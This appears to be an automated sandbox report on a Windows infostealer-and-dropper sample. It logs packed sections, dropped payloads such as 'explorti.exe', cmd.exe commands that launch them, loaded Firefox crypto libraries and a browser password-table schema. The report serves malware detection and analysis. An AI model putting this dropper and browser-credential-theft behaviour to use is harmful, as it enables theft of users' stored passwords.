Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637710 0_2_6C637710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C626FF0 0_2_6C626FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FDFE0 0_2_6C5FDFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6477A0 0_2_6C6477A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63F070 0_2_6C63F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C618850 0_2_6C618850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61D850 0_2_6C61D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63B820 0_2_6C63B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C644820 0_2_6C644820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C607810 0_2_6C607810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61C0E0 0_2_6C61C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6358E0 0_2_6C6358E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6650C7 0_2_6C6650C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6260A0 0_2_6C6260A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60D960 0_2_6C60D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64B970 0_2_6C64B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66B170 0_2_6C66B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61A940 0_2_6C61A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62D9B0 0_2_6C62D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635190 0_2_6C635190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C652990 0_2_6C652990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FC9A0 0_2_6C5FC9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639A60 0_2_6C639A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C611AF0 0_2_6C611AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63E2F0 0_2_6C63E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C638AC0 0_2_6C638AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C624AA0 0_2_6C624AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60CAB0 0_2_6C60CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C662AB0 0_2_6C662AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66BA90 0_2_6C66BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F22A0 0_2_6C5F22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C370 0_2_6C60C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F5340 0_2_6C5F5340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6653C8 0_2_6C6653C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FF380 0_2_6C5FF380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0019E410 12_2_0019E410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D3048 12_2_001D3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00194CD0 12_2_00194CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001C7D63 12_2_001C7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D763B 12_2_001D763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00194AD0 12_2_00194AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D6EE9 12_2_001D6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D8700 12_2_001D8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D775B 12_2_001D775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001D2BB0 12_2_001D2BB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C62CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6394D0 appears 88 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.1822925903.000000000149E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs file.exe
Source: file.exe, 00000000.00000002.1869148294.000000006C875000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9996427210365854
Source: file.exe Static PE information: Section: ZLIB complexity 0.99188232421875
Source: file.exe Static PE information: Section: ZLIB complexity 0.9896240234375
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: amadka[1].exe.0.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: JJEGIJEGDB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: JJEGIJEGDB.exe.0.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 0.9984097506830601
Source: explorti.exe.5.dr Static PE information: Section: ohmzqnep ZLIB complexity 0.9941242376864512
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/27@0/3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C657030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C657030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.1869041283.000000006C82F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.1703015007.00000000229C4000.00000004.00000020.00020000.00000000.sdmp, FCAEBFIJKEBGHIDHIEGI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.1855343572.000000001CA4C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1868607873.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe Virustotal: Detection: 47%
Source: JJEGIJEGDB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
